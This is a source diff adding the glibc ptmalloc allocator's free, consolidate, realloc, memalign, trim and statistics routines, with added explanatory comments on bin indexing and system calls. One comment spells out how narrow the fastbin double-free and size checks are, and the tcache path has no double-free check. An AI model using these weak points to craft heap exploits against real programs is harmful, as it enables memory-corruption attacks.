+              /*  We know the first chunk in this bin is big enough to use. */
+              assert ((unsigned long) (size) >= (unsigned long) (nb));
+
+              remainder_size = size - nb;
+
+              /* unlink */
+              unlink (av, victim, bck, fwd);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+                  if (__glibc_unlikely (fwd->bk != bck))
+                    {
+                      errstr = "malloc(): corrupted unsorted chunks 2";
+                      goto errout;
+                    }
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+
+                  /* advertise as last remainder */
+                  if (in_smallbin_range (nb))
+                    av->last_remainder = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+    use_top:
+      /*
+         If large enough, split off the chunk bordering the end of memory
+         (held in av->top). Note that this is in accord with the best-fit
+         search rule.  In effect, av->top is treated as larger (and thus
+         less well fitting) than any other available chunk since it can
+         be extended to be as large as necessary (up to system
+         limitations).
+
+         We require that av->top always exists (i.e., has size >=
+         MINSIZE) after initialization, so if it would otherwise be
+         exhausted by current request, it is replenished. (The main
+         reason for ensuring it exists is that we may need MINSIZE space
+         to put in fenceposts in sysmalloc.)
+       */
+
+      victim = av->top;
+      size = chunksize (victim);
+
+      if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (victim, nb);
+          av->top = remainder;
+          set_head (victim, nb | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head (remainder, remainder_size | PREV_INUSE);
+
+          check_malloced_chunk (av, victim, nb);
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+
+      /* When we are using atomic ops to free fast chunks we can get
+         here for all block sizes.  */
+      else if (have_fastchunks (av))
+        {
+          malloc_consolidate (av);
+          /* restore original bin index */
+          if (in_smallbin_range (nb))
+            idx = smallbin_index (nb);
+          else
+            idx = largebin_index (nb);
+        }
+
+      /*
+         Otherwise, relay to handle system-dependent cases
+       */
+      else
+        {
+          void *p = sysmalloc (nb, av);
+          if (p != NULL)
+            alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+}
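+
+/* Worked example, not part of the library code: how a chunk size maps to
+   the bin indices used above, assuming the usual 64-bit definitions of
+   fastbin_index and csize2tidx earlier in this file (SIZE_SZ == 8,
+   MALLOC_ALIGNMENT == 16, MINSIZE == 32).
+
+     size_t csize   = 0x40;                         // e.g. from malloc(0x38)
+     unsigned f_idx = (unsigned) (csize >> 4) - 2;  // fastbin_index -> 2
+     size_t   t_idx = (csize - 32 + 15) / 16;       // csize2tidx    -> 2
+
+   With the default of 64 tcache bins this covers chunk sizes up to 0x410;
+   larger requests skip the tcache paths entirely.  */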
+
+/*
+   ------------------------------ free ------------------------------
+ */
+
+static void
+_int_free (mstate av, mchunkptr p, int have_lock)
+{
+  INTERNAL_SIZE_T size;        /* its size */
+  mfastbinptr *fb;             /* associated fastbin */
+  mchunkptr nextchunk;         /* next contiguous chunk */
+  INTERNAL_SIZE_T nextsize;    /* its size */
+  int nextinuse;               /* true if nextchunk is used */
+  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
+  mchunkptr bck;               /* misc temp for linking */
+  mchunkptr fwd;               /* misc temp for linking */
+
+  const char *errstr = NULL;
+  int locked = 0;
+
+  size = chunksize (p);
+
+  /* Little security check which won't hurt performance: the
+     allocator never wraps around at the end of the address space.
+     Therefore we can exclude some size values which might appear
+     here by accident or by "design" from some intruder.  */
+  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
+      || __builtin_expect (misaligned_chunk (p), 0))
+    {
+      errstr = "free(): invalid pointer";
+    errout:
+      if (!have_lock && locked)
+        __libc_lock_unlock (av->mutex);
+      malloc_printerr (check_action, errstr, chunk2mem (p), av);
+      return;
+    }
+  /* We know that each chunk is at least MINSIZE bytes in size and a
+     multiple of MALLOC_ALIGNMENT.  */
+  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
+    {
+      errstr = "free(): invalid size";
+      goto errout;
+    }
+
+  check_inuse_chunk(av, p);
+
+#if USE_TCACHE
+  {
+    size_t tc_idx = csize2tidx (size);
+
+    if (tcache
+	&& tc_idx < mp_.tcache_bins
+	&& tcache->counts[tc_idx] < mp_.tcache_count)
+      {
+	tcache_put (p, tc_idx);
+	return;
+      }
+  }
+#endif
+
+  /*
+    If eligible, place chunk on a fastbin so it can be found
+    and used quickly in malloc.
+  */
+
+  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
+
+#if TRIM_FASTBINS
+      /*
+	If TRIM_FASTBINS set, don't place chunks
+	bordering top into fastbins
+      */
+      && (chunk_at_offset(p, size) != av->top)
+#endif
+      ) {
+
+    if (__builtin_expect (chunksize_nomask (chunk_at_offset (p, size))
+			  <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (chunksize (chunk_at_offset (p, size))
+			     >= av->system_mem, 0))
+      {
+        /* We might not have a lock at this point and concurrent modifications
+           of system_mem might have led to a false positive.  Redo the test
+           after getting the lock.  */
+	if (have_lock
+	    || ({ assert (locked == 0);
+		  __libc_lock_lock (av->mutex);
+		  locked = 1;
+		  chunksize_nomask (chunk_at_offset (p, size)) <= 2 * SIZE_SZ
+		    || chunksize (chunk_at_offset (p, size)) >= av->system_mem;
+	      }))
+	  {
+	    errstr = "free(): invalid next size (fast)";
+	    goto errout;
+	  }
+	if (! have_lock)
+	  {
+	    __libc_lock_unlock (av->mutex);
+	    locked = 0;
+	  }
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    set_fastchunks(av);
+    unsigned int idx = fastbin_index(size);
+    fb = &fastbin (av, idx);
+
+    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
+    mchunkptr old = *fb, old2;
+    unsigned int old_idx = ~0u;
+    do
+      {
+	/* Check that the top of the bin is not the record we are going to add
+	   (i.e., double free).  */
+	if (__builtin_expect (old == p, 0))
+	  {
+	    errstr = "double free or corruption (fasttop)";
+	    goto errout;
+	  }
+	/* Check that size of fastbin chunk at the top is the same as
+	   size of the chunk that we are adding.  We can dereference OLD
+	   only if we have the lock, otherwise it might have already been
+	   deallocated.  See use of OLD_IDX below for the actual check.  */
+	if (have_lock && old != NULL)
+	  old_idx = fastbin_index(chunksize(old));
+	p->fd = old2 = old;
+      }
+    while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2)) != old2);
+
+    if (have_lock && old != NULL && __builtin_expect (old_idx != idx, 0))
+      {
+	errstr = "invalid fastbin entry (free)";
+	goto errout;
+      }
+  }
+
+  /*
+    Consolidate other non-mmapped chunks as they arrive.
+  */
+
+  else if (!chunk_is_mmapped(p)) {
+    if (! have_lock) {
+      __libc_lock_lock (av->mutex);
+      locked = 1;
+    }
+
+    nextchunk = chunk_at_offset(p, size);
+
+    /* Lightweight tests: check whether the block is already the
+       top block.  */
+    if (__glibc_unlikely (p == av->top))
+      {
+	errstr = "double free or corruption (top)";
+	goto errout;
+      }
+    /* Or whether the next chunk is beyond the boundaries of the arena.  */
+    if (__builtin_expect (contiguous (av)
+			  && (char *) nextchunk
+			  >= ((char *) av->top + chunksize(av->top)), 0))
+      {
+	errstr = "double free or corruption (out)";
+	goto errout;
+      }
+    /* Or whether the block is actually not marked used.  */
+    if (__glibc_unlikely (!prev_inuse(nextchunk)))
+      {
+	errstr = "double free or corruption (!prev)";
+	goto errout;
+      }
+
+    nextsize = chunksize(nextchunk);
+    if (__builtin_expect (chunksize_nomask (nextchunk) <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (nextsize >= av->system_mem, 0))
+      {
+	errstr = "free(): invalid next size (normal)";
+	goto errout;
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    /* consolidate backward */
+    if (!prev_inuse(p)) {
+      prevsize = prev_size (p);
+      size += prevsize;
+      p = chunk_at_offset(p, -((long) prevsize));
+      unlink(av, p, bck, fwd);
+    }
+
+    if (nextchunk != av->top) {
+      /* get and clear inuse bit */
+      nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+      /* consolidate forward */
+      if (!nextinuse) {
+	unlink(av, nextchunk, bck, fwd);
+	size += nextsize;
+      } else
+	clear_inuse_bit_at_offset(nextchunk, 0);
+
+      /*
+	Place the chunk in unsorted chunk list. Chunks are
+	not placed into regular bins until after they have
+	been given one chance to be used in malloc.
+      */
+
+      bck = unsorted_chunks(av);
+      fwd = bck->fd;
+      if (__glibc_unlikely (fwd->bk != bck))
+	{
+	  errstr = "free(): corrupted unsorted chunks";
+	  goto errout;
+	}
+      p->fd = fwd;
+      p->bk = bck;
+      if (!in_smallbin_range(size))
+	{
+	  p->fd_nextsize = NULL;
+	  p->bk_nextsize = NULL;
+	}
+      bck->fd = p;
+      fwd->bk = p;
+
+      set_head(p, size | PREV_INUSE);
+      set_foot(p, size);
+
+      check_free_chunk(av, p);
+    }
+
+    /*
+      If the chunk borders the current high end of memory,
+      consolidate into top
+    */
+
+    else {
+      size += nextsize;
+      set_head(p, size | PREV_INUSE);
+      av->top = p;
+      check_chunk(av, p);
+    }
+
+    /*
+      If freeing a large space, consolidate possibly-surrounding
+      chunks. Then, if the total unused topmost memory exceeds trim
+      threshold, ask malloc_trim to reduce top.
+
+      Unless max_fast is 0, we don't know if there are fastbins
+      bordering top, so we cannot tell for sure whether threshold
+      has been reached unless fastbins are consolidated.  But we
+      don't want to consolidate on each free.  As a compromise,
+      consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD
+      is reached.
+    */
+
+    if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
+      if (have_fastchunks(av))
+	malloc_consolidate(av);
+
+      if (av == &main_arena) {
+#ifndef MORECORE_CANNOT_TRIM
+	if ((unsigned long)(chunksize(av->top)) >=
+	    (unsigned long)(mp_.trim_threshold))
+	  systrim(mp_.top_pad, av);
+#endif
+      } else {
+	/* Always try heap_trim(), even if the top chunk is not
+	   large, because the corresponding heap might go away.  */
+	heap_info *heap = heap_for_ptr(top(av));
+
+	assert(heap->ar_ptr == av);
+	heap_trim(heap, mp_.top_pad);
+      }
+    }
+
+    if (! have_lock) {
+      assert (locked);
+      __libc_lock_unlock (av->mutex);
+    }
+  }
+  /*
+    If the chunk was allocated via mmap, release via munmap().
+  */
+
+  else {
+    munmap_chunk (p);
+  }
+}
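+
+/* Illustrative sketch, not part of the library code: the only fastbin
+   double-free detection above is the "fasttop" test, which compares the
+   chunk being freed against the current head of its bin.  Stripped of the
+   atomics, the push looks like this:
+
+     struct node { struct node *fd; };
+
+     static int push_checked (struct node **head, struct node *n)
+     {
+       if (*head == n)
+         return 0;              // "double free or corruption (fasttop)"
+       n->fd = *head;           // P->FD = *FB
+       *head = n;               // *FB = P
+       return 1;
+     }
+
+   The size consistency of the old head (old_idx == idx) is only verified
+   when the caller already holds the arena lock.  */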
+
+/*
+  ------------------------- malloc_consolidate -------------------------
+
+  malloc_consolidate is a specialized version of free() that tears
+  down chunks held in fastbins.  Free itself cannot be used for this
+  purpose since, among other things, it might place chunks back onto
+  fastbins.  So, instead, we need to use a minor variant of the same
+  code.
+
+  Also, because this routine needs to be called the first time through
+  malloc anyway, it turns out to be the perfect place to trigger
+  initialization code.
+*/
+
+static void malloc_consolidate(mstate av)
+{
+  mfastbinptr*    fb;                 /* current fastbin being consolidated */
+  mfastbinptr*    maxfb;              /* last fastbin (for loop control) */
+  mchunkptr       p;                  /* current chunk being consolidated */
+  mchunkptr       nextp;              /* next chunk to consolidate */
+  mchunkptr       unsorted_bin;       /* bin header */
+  mchunkptr       first_unsorted;     /* chunk to link to */
+
+  /* These have same use as in free() */
+  mchunkptr       nextchunk;
+  INTERNAL_SIZE_T size;
+  INTERNAL_SIZE_T nextsize;
+  INTERNAL_SIZE_T prevsize;
+  int             nextinuse;
+  mchunkptr       bck;
+  mchunkptr       fwd;
+
+  /*
+    If max_fast is 0, we know that av hasn't
+    yet been initialized, in which case do so below
+  */
+
+  if (get_max_fast () != 0) {
+    clear_fastchunks(av);
+
+    unsorted_bin = unsorted_chunks(av);
+
+    /*
+      Remove each chunk from fast bin and consolidate it, placing it
+      then in unsorted bin. Among other reasons for doing this,
+      placing in unsorted bin avoids needing to calculate actual bins
+      until malloc is sure that chunks aren't immediately going to be
+      reused anyway.
+    */
+
+    maxfb = &fastbin (av, NFASTBINS - 1);
+    fb = &fastbin (av, 0);
+    do {
+      p = atomic_exchange_acq (fb, NULL);
+      if (p != 0) {
+	do {
+	  check_inuse_chunk(av, p);
+	  nextp = p->fd;
+
+	  /* Slightly streamlined version of consolidation code in free() */
+	  size = chunksize (p);
+	  nextchunk = chunk_at_offset(p, size);
+	  nextsize = chunksize(nextchunk);
+
+	  if (!prev_inuse(p)) {
+	    prevsize = prev_size (p);
+	    size += prevsize;
+	    p = chunk_at_offset(p, -((long) prevsize));
+	    unlink(av, p, bck, fwd);
+	  }
+
+	  if (nextchunk != av->top) {
+	    nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+	    if (!nextinuse) {
+	      size += nextsize;
+	      unlink(av, nextchunk, bck, fwd);
+	    } else
+	      clear_inuse_bit_at_offset(nextchunk, 0);
+
+	    first_unsorted = unsorted_bin->fd;
+	    unsorted_bin->fd = p;
+	    first_unsorted->bk = p;
+
+	    if (!in_smallbin_range (size)) {
+	      p->fd_nextsize = NULL;
+	      p->bk_nextsize = NULL;
+	    }
+
+	    set_head(p, size | PREV_INUSE);
+	    p->bk = unsorted_bin;
+	    p->fd = first_unsorted;
+	    set_foot(p, size);
+	  }
+
+	  else {
+	    size += nextsize;
+	    set_head(p, size | PREV_INUSE);
+	    av->top = p;
+	  }
+
+	} while ( (p = nextp) != 0);
+
+      }
+    } while (fb++ != maxfb);
+  }
+  else {
+    malloc_init_state(av);
+    check_malloc_state(av);
+  }
+}
+
+/*
+  ------------------------------ realloc ------------------------------
+*/
+
+void*
+_int_realloc(mstate av, mchunkptr oldp, INTERNAL_SIZE_T oldsize,
+	     INTERNAL_SIZE_T nb)
+{
+  mchunkptr        newp;            /* chunk to return */
+  INTERNAL_SIZE_T  newsize;         /* its size */
+  void*          newmem;          /* corresponding user mem */
+
+  mchunkptr        next;            /* next contiguous chunk after oldp */
+
+  mchunkptr        remainder;       /* extra space at end of newp */
+  unsigned long    remainder_size;  /* its size */
+
+  mchunkptr        bck;             /* misc temp for linking */
+  mchunkptr        fwd;             /* misc temp for linking */
+
+  unsigned long    copysize;        /* bytes to copy */
+  unsigned int     ncopies;         /* INTERNAL_SIZE_T words to copy */
+  INTERNAL_SIZE_T* s;               /* copy source */
+  INTERNAL_SIZE_T* d;               /* copy destination */
+
+  const char *errstr = NULL;
+
+  /* oldmem size */
+  if (__builtin_expect (chunksize_nomask (oldp) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (oldsize >= av->system_mem, 0))
+    {
+      errstr = "realloc(): invalid old size";
+    errout:
+      malloc_printerr (check_action, errstr, chunk2mem (oldp), av);
+      return NULL;
+    }
+
+  check_inuse_chunk (av, oldp);
+
+  /* All callers already filter out mmap'ed chunks.  */
+  assert (!chunk_is_mmapped (oldp));
+
+  next = chunk_at_offset (oldp, oldsize);
+  INTERNAL_SIZE_T nextsize = chunksize (next);
+  if (__builtin_expect (chunksize_nomask (next) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (nextsize >= av->system_mem, 0))
+    {
+      errstr = "realloc(): invalid next size";
+      goto errout;
+    }
+
+  if ((unsigned long) (oldsize) >= (unsigned long) (nb))
+    {
+      /* already big enough; split below */
+      newp = oldp;
+      newsize = oldsize;
+    }
+
+  else
+    {
+      /* Try to expand forward into top */
+      if (next == av->top &&
+          (unsigned long) (newsize = oldsize + nextsize) >=
+          (unsigned long) (nb + MINSIZE))
+        {
+          set_head_size (oldp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+          av->top = chunk_at_offset (oldp, nb);
+          set_head (av->top, (newsize - nb) | PREV_INUSE);
+          check_inuse_chunk (av, oldp);
+          return chunk2mem (oldp);
+        }
+
+      /* Try to expand forward into next chunk;  split off remainder below */
+      else if (next != av->top &&
+               !inuse (next) &&
+               (unsigned long) (newsize = oldsize + nextsize) >=
+               (unsigned long) (nb))
+        {
+          newp = oldp;
+          unlink (av, next, bck, fwd);
+        }
+
+      /* allocate, copy, free */
+      else
+        {
+          newmem = _int_malloc (av, nb - MALLOC_ALIGN_MASK);
+          if (newmem == 0)
+            return 0; /* propagate failure */
+
+          newp = mem2chunk (newmem);
+          newsize = chunksize (newp);
+
+          /*
+             Avoid copy if newp is next chunk after oldp.
+           */
+          if (newp == next)
+            {
+              newsize += oldsize;
+              newp = oldp;
+            }
+          else
+            {
+              /*
+                 Unroll copy of <= 36 bytes (72 if 8-byte sizes)
+                 We know that contents have an odd number of
+                 INTERNAL_SIZE_T-sized words; minimally 3.
+               */
+
+              copysize = oldsize - SIZE_SZ;
+              s = (INTERNAL_SIZE_T *) (chunk2mem (oldp));
+              d = (INTERNAL_SIZE_T *) (newmem);
+              ncopies = copysize / sizeof (INTERNAL_SIZE_T);
+              assert (ncopies >= 3);
+
+              if (ncopies > 9)
+                memcpy (d, s, copysize);
+
+              else
+                {
+                  *(d + 0) = *(s + 0);
+                  *(d + 1) = *(s + 1);
+                  *(d + 2) = *(s + 2);
+                  if (ncopies > 4)
+                    {
+                      *(d + 3) = *(s + 3);
+                      *(d + 4) = *(s + 4);
+                      if (ncopies > 6)
+                        {
+                          *(d + 5) = *(s + 5);
+                          *(d + 6) = *(s + 6);
+                          if (ncopies > 8)
+                            {
+                              *(d + 7) = *(s + 7);
+                              *(d + 8) = *(s + 8);
+                            }
+                        }
+                    }
+                }
+
+              _int_free (av, oldp, 1);
+              check_inuse_chunk (av, newp);
+              return chunk2mem (newp);
+            }
+        }
+    }
+
+  /* If possible, free extra space in old or extended chunk */
+
+  assert ((unsigned long) (newsize) >= (unsigned long) (nb));
+
+  remainder_size = newsize - nb;
+
+  if (remainder_size < MINSIZE)   /* not enough extra to split off */
+    {
+      set_head_size (newp, newsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+    }
+  else   /* split remainder */
+    {
+      remainder = chunk_at_offset (newp, nb);
+      set_head_size (newp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      /* Mark remainder as inuse so free() won't complain */
+      set_inuse_bit_at_offset (remainder, remainder_size);
+      _int_free (av, remainder, 1);
+    }
+
+  check_inuse_chunk (av, newp);
+  return chunk2mem (newp);
+}
+
+/*
+   ------------------------------ memalign ------------------------------
+ */
+
+static void *
+_int_memalign (mstate av, size_t alignment, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;             /* padded  request size */
+  char *m;                        /* memory returned by malloc call */
+  mchunkptr p;                    /* corresponding chunk */
+  char *brk;                      /* alignment point within p */
+  mchunkptr newp;                 /* chunk to return */
+  INTERNAL_SIZE_T newsize;        /* its size */
+  INTERNAL_SIZE_T leadsize;       /* leading space before alignment point */
+  mchunkptr remainder;            /* spare room at end to split off */
+  unsigned long remainder_size;   /* its size */
+  INTERNAL_SIZE_T size;
+
+
+
+  checked_request2size (bytes, nb);
+
+  /*
+     Strategy: find a spot within that chunk that meets the alignment
+     request, and then possibly free the leading and trailing space.
+   */
+
+
+  /* Call malloc with worst case padding to hit alignment. */
+
+  m = (char *) (_int_malloc (av, nb + alignment + MINSIZE));
+
+  if (m == 0)
+    return 0;           /* propagate failure */
+
+  p = mem2chunk (m);
+
+  if ((((unsigned long) (m)) % alignment) != 0)   /* misaligned */
+
+    {
+      /* Find an aligned spot inside chunk.  Since we need to give back
+         leading space in a chunk of at least MINSIZE, if the first
+         calculation places us at a spot with less than MINSIZE leader,
+         we can move to the next aligned spot -- we've allocated enough
+         total room so that this is always possible.  */
+      brk = (char *) mem2chunk (((unsigned long) (m + alignment - 1)) &
+                                - ((signed long) alignment));
+      if ((unsigned long) (brk - (char *) (p)) < MINSIZE)
+        brk += alignment;
+
+      newp = (mchunkptr) brk;
+      leadsize = brk - (char *) (p);
+      newsize = chunksize (p) - leadsize;
+
+      /* For mmapped chunks, just adjust offset */
+      if (chunk_is_mmapped (p))
+        {
+          set_prev_size (newp, prev_size (p) + leadsize);
+          set_head (newp, newsize | IS_MMAPPED);
+          return chunk2mem (newp);
+        }
+
+      /* Otherwise, give back leader, use the rest */
+      set_head (newp, newsize | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+      set_head_size (p, leadsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      _int_free (av, p, 1);
+      p = newp;
+
+      assert (newsize >= nb &&
+              (((unsigned long) (chunk2mem (p))) % alignment) == 0);
+    }
+
+  /* Also give back spare room at the end */
+  if (!chunk_is_mmapped (p))
+    {
+      size = chunksize (p);
+      if ((unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (p, nb);
+          set_head (remainder, remainder_size | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head_size (p, nb);
+          _int_free (av, remainder, 1);
+        }
+    }
+
+  check_inuse_chunk (av, p);
+  return chunk2mem (p);
+}
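+
+/* Worked example with hypothetical numbers, not part of the library code:
+   the aligned spot is found with the usual round-up mask (equivalent, for
+   a power-of-two alignment, to the & -alignment form used above), then
+   bumped by one more alignment unit if the leading slice would be smaller
+   than MINSIZE.
+
+     #include <stdint.h>
+
+     uintptr_t m         = 0x555555559010;   // address malloc returned
+     uintptr_t alignment = 0x1000;
+     uintptr_t aligned   = (m + alignment - 1) & ~(alignment - 1);
+     // aligned == 0x55555555a000; the 0xff0-byte leader is >= MINSIZE,
+     // so no extra step is needed in this case.
+  */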
+
+
+/*
+   ------------------------------ malloc_trim ------------------------------
+ */
+
+static int
+mtrim (mstate av, size_t pad)
+{
+  /* Don't touch corrupt arenas.  */
+  if (arena_is_corrupt (av))
+    return 0;
+
+  /* Ensure initialization/consolidation */
+  malloc_consolidate (av);
+
+  const size_t ps = GLRO (dl_pagesize);
+  int psindex = bin_index (ps);
+  const size_t psm1 = ps - 1;
+
+  int result = 0;
+  for (int i = 1; i < NBINS; ++i)
+    if (i == 1 || i >= psindex)
+      {
+        mbinptr bin = bin_at (av, i);
+
+        for (mchunkptr p = last (bin); p != bin; p = p->bk)
+          {
+            INTERNAL_SIZE_T size = chunksize (p);
+
+            if (size > psm1 + sizeof (struct malloc_chunk))
+              {
+                /* See whether the chunk contains at least one unused page.  */
+                char *paligned_mem = (char *) (((uintptr_t) p
+                                                + sizeof (struct malloc_chunk)
+                                                + psm1) & ~psm1);
+
+                assert ((char *) chunk2mem (p) + 4 * SIZE_SZ <= paligned_mem);
+                assert ((char *) p + size > paligned_mem);
+
+                /* This is the size we could potentially free.  */
+                size -= paligned_mem - (char *) p;
+
+                if (size > psm1)
+                  {
+#if MALLOC_DEBUG
+                    /* When debugging we simulate destroying the memory
+                       content.  */
+                    memset (paligned_mem, 0x89, size & ~psm1);
+#endif
+                    __madvise (paligned_mem, size & ~psm1, MADV_DONTNEED);
+
+                    result = 1;
+                  }
+              }
+          }
+      }
+
+#ifndef MORECORE_CANNOT_TRIM
+  return result | (av == &main_arena ? systrim (pad, av) : 0);
+
+#else
+  return result;
+#endif
+}
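+
+/* Illustrative sketch, not part of the library code: the MADV_DONTNEED
+   calls above only ever cover whole pages inside a free chunk.  The same
+   system call can be exercised on an ordinary anonymous mapping
+   (Linux-specific flags assumed):
+
+     #include <sys/mman.h>
+
+     char *region = mmap (NULL, 2 * 4096, PROT_READ | PROT_WRITE,
+                          MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+     madvise (region + 4096, 4096, MADV_DONTNEED);   // drop the 2nd page
+
+   The mapping stays valid; the advised page is simply repopulated with
+   zero-filled pages on the next touch.  */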
+
+
+int
+__malloc_trim (size_t s)
+{
+  int result = 0;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      result |= mtrim (ar_ptr, s);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return result;
+}
+
+
+/*
+   ------------------------- malloc_usable_size -------------------------
+ */
+
+static size_t
+musable (void *mem)
+{
+  mchunkptr p;
+  if (mem != 0)
+    {
+      p = mem2chunk (mem);
+
+      if (__builtin_expect (using_malloc_checking == 1, 0))
+        return malloc_check_get_size (p);
+
+      if (chunk_is_mmapped (p))
+	{
+	  if (DUMPED_MAIN_ARENA_CHUNK (p))
+	    return chunksize (p) - SIZE_SZ;
+	  else
+	    return chunksize (p) - 2 * SIZE_SZ;
+	}
+      else if (inuse (p))
+        return chunksize (p) - SIZE_SZ;
+    }
+  return 0;
+}
+
+
+size_t
+__malloc_usable_size (void *m)
+{
+  size_t result;
+
+  result = musable (m);
+  return result;
+}
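+
+/* Usage sketch, not part of the library code: for a normal in-use chunk
+   the reported figure is the chunk size minus one size field, so it is
+   usually a little larger than what was requested.
+
+     #include <malloc.h>
+     #include <stdio.h>
+     #include <stdlib.h>
+
+     char *p = malloc (20);
+     printf ("%zu\n", malloc_usable_size (p));
+     // Typically prints 24 on a 64-bit build: the request pads up to a
+     // 0x20-byte chunk, and SIZE_SZ bytes of header are subtracted.
+  */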
+
+/*
+   ------------------------------ mallinfo ------------------------------
+   Accumulate malloc statistics for arena AV into M.
+ */
+
+static void
+int_mallinfo (mstate av, struct mallinfo *m)
+{
+  size_t i;
+  mbinptr b;
+  mchunkptr p;
+  INTERNAL_SIZE_T avail;
+  INTERNAL_SIZE_T fastavail;
+  int nblocks;
+  int nfastblocks;
+
+  /* Ensure initialization */
+  if (av->top == 0)
+    malloc_consolidate (av);
+
+  check_malloc_state (av);
+
+  /* Account for top */
+  avail = chunksize (av->top);
+  nblocks = 1;  /* top always exists */
+
+  /* traverse fastbins */
+  nfastblocks = 0;
+  fastavail = 0;
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      for (p = fastbin (av, i); p != 0; p = p->fd)
+        {
+          ++nfastblocks;
+          fastavail += chunksize (p);
+        }
+    }
+
+  avail += fastavail;
+
+  /* traverse regular bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+      for (p = last (b); p != b; p = p->bk)
+        {
+          ++nblocks;
+          avail += chunksize (p);
+        }
+    }
+
+  m->smblks += nfastblocks;
+  m->ordblks += nblocks;
+  m->fordblks += avail;
+  m->uordblks += av->system_mem - avail;
+  m->arena += av->system_mem;
+  m->fsmblks += fastavail;
+  if (av == &main_arena)
+    {
+      m->hblks = mp_.n_mmaps;
+      m->hblkhd = mp_.mmapped_mem;
+      m->usmblks = 0;
+      m->keepcost = chunksize (av->top);
+    }
+}
+
+
+struct mallinfo
+__libc_mallinfo (void)
+{
+  struct mallinfo m;
+  mstate ar_ptr;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  memset (&m, 0, sizeof (m));
+  ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &m);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return m;
+}
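+
+/* Usage sketch, not part of the library code: a caller sees the per-arena
+   sums through the public mallinfo interface (note the fields are plain
+   ints, so very large heaps can overflow them).
+
+     #include <malloc.h>
+     #include <stdio.h>
+
+     struct mallinfo mi = mallinfo ();
+     printf ("arena (heap bytes)     = %d\n", mi.arena);
+     printf ("uordblks (in use)      = %d\n", mi.uordblks);
+     printf ("fordblks (free)        = %d\n", mi.fordblks);
+     printf ("hblkhd (mmapped bytes) = %d\n", mi.hblkhd);
+  */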
+
+/*
+   ------------------------------ malloc_stats ------------------------------
+ */
+
+void
+__malloc_stats (void)
+{
+  int i;
+  mstate ar_ptr;
+  unsigned int in_use_b = mp_.mmapped_mem, system_b = in_use_b;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  _IO_flockfile (stderr);
+  int old_flags2 = ((_IO_FILE *) stderr)->_flags2;
+  ((_IO_FILE *) stderr)->_flags2 |= _IO_FLAGS2_NOTCANCEL;
+  for (i = 0, ar_ptr = &main_arena;; i++)
+    {
+      struct mallinfo mi;
+
+      memset (&mi, 0, sizeof (mi));
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &mi);
+      fprintf (stderr, "Arena %d:\n", i);
+      fprintf (stderr, "system bytes     = %10u\n", (unsigned int) mi.arena);
+      fprintf (stderr, "in use bytes     = %10u\n", (unsigned int) mi.uordblks);
